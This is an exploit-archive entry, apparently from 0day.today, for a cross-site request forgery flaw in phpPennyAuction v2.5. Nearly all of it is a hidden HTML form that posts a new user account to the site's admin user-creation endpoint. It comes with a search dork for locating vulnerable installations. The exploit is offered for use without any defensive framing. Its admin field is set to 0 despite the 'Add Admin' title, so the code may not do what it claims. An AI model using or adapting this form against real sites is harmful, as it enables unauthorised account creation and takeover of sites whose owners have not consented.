phpPennyAuction v2.5 CSRF Vulnerability (Add Admin)

2012-06-01T00:00:00
ID 1337DAY-ID-18406
Type zdt
Reporter AtT4CKxT3rR0r1ST
Modified 2012-06-01T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            phpPennyAuction v2.5 CSRF Vulnerability (Add Admin)
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [[email protected]]
.:. Script         : http://www.phppennyauction.com/
.:. Tested On Demo : http://www.phppennyauctiondemo.com/
.:. Dork           : "Powered by phpPennyAuction"
####################################################################

===[ Exploit ]===

<form method="POST" name="form0" action="http://SiTE/admin/users/add">
<input type="hidden" name="_method" value="POST"/>
<input type="hidden" name="data[User][id]" value=""/>
<input type="hidden" name="data[User][username]" value="Admin"/>
<input type="hidden" name="data[User][first_name]" value="Mohamad"/>
<input type="hidden" name="data[User][last_name]" value="Hussien"/>
<input type="hidden" name="data[User][email]" value="[email protected]"/>
<input type="hidden" name="data[User][date_of_birth][month]" value="5"/>
<input type="hidden" name="data[User][date_of_birth][day]" value="17"/>
<input type="hidden" name="data[User][date_of_birth][year]" value="1991"/>
<input type="hidden" name="data[User][phone_number]" value="...."/>
<input type="hidden" name="data[User][gender_id]" value="1"/>
<input type="hidden" name="data[User][tax_number]" value="...."/>
<input type="hidden" name="data[User][newsletter]" value="0"/>
<input type="hidden" name="data[User][admin]" value="0"/>
</form>

</body>
</html>
####################################################################



#  0day.today [2018-01-04]  #